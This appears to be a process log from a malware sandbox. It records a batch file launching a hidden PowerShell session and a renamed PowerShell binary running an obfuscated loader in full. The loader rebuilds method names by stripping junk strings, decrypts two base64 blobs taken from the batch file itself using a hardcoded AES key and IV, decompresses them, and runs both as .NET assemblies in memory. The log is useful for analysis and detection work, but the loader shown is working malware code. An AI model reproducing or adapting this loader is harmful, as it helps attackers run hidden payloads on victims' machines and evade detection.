cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "MJTdZEt" C:\Users\test22\AppData\Local\Temp\cpp_self_SC.bat
1492powershell.exe powershell -w hidden -c #
2144cpp_self_SC.bat.exe "C:\Users\test22\AppData\Local\Temp\cpp_self_SC.bat.exe" $hoqP='MaASJPinMASJPodASJPuASJPleASJP'.Replace('ASJP', '');$icJO='LoASJPadASJP'.Replace('ASJP', '');$PTNQ='EASJPnASJPtASJPrASJPyPoASJPinASJPtASJP'.Replace('ASJP', '');$qOyZ='SASJPpliASJPtASJP'.Replace('ASJP', '');$Pdxo='CASJPrASJPeaASJPtASJPeDASJPecASJPryptASJPorASJP'.Replace('ASJP', '');$TEkt='TranASJPsfoASJPrmASJPFinaASJPlBASJPloASJPckASJP'.Replace('ASJP', '');$xFRM='FroASJPmBaASJPse6ASJP4StASJPriASJPngASJP'.Replace('ASJP', '');$cDSQ='CASJPhASJPaASJPngASJPeASJPExteASJPnsiASJPonASJP'.Replace('ASJP', '');$hMFe='FirASJPstASJP'.Replace('ASJP', '');$dBAR='GetCASJPuASJPrreASJPntASJPProASJPceASJPssASJP'.Replace('ASJP', '');$Wijw='IASJPnvASJPokASJPeASJP'.Replace('ASJP', '');$FOKd='ReASJPadASJPLASJPinASJPesASJP'.Replace('ASJP', '');function IgypD($utrtk){$NjyUn=[System.Security.Cryptography.Aes]::Create();$NjyUn.Mode=[System.Security.Cryptography.CipherMode]::CBC;$NjyUn.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$NjyUn.Key=[System.Convert]::$xFRM('ObPQe07WRiYWEUTOpWDEw/EZfBcGQKT9ju4qCcGJuXE=');$NjyUn.IV=[System.Convert]::$xFRM('DgAS1sFB7YAK8VQ/Y81U7Q==');$nkxgc=$NjyUn.$Pdxo();$pgtXE=$nkxgc.$TEkt($utrtk,0,$utrtk.Length);$nkxgc.Dispose();$NjyUn.Dispose();$pgtXE;}function tEuKj($utrtk){$ClWPe=New-Object System.IO.MemoryStream(,$utrtk);$JHyon=New-Object System.IO.MemoryStream;$aZrPy=New-Object System.IO.Compression.GZipStream($ClWPe,[IO.Compression.CompressionMode]::Decompress);$aZrPy.CopyTo($JHyon);$aZrPy.Dispose();$ClWPe.Dispose();$JHyon.Dispose();$JHyon.ToArray();}$pLLSf=[System.Linq.Enumerable]::$hMFe([System.IO.File]::$FOKd([System.IO.Path]::$cDSQ([System.Diagnostics.Process]::$dBAR().$hoqP.FileName, $null)));$XQVFj=$pLLSf.Substring(3).$qOyZ(':');$VsmWT=tEuKj (IgypD ([Convert]::$xFRM($XQVFj[0])));$YKzPU=tEuKj (IgypD ([Convert]::$xFRM($XQVFj[1])));[System.Reflection.Assembly]::$icJO([byte[]]$YKzPU).$PTNQ.$Wijw($null,$null);[System.Reflection.Assembly]::$icJO([byte[]]$VsmWT).$PTNQ.$Wijw($null,$null);
2280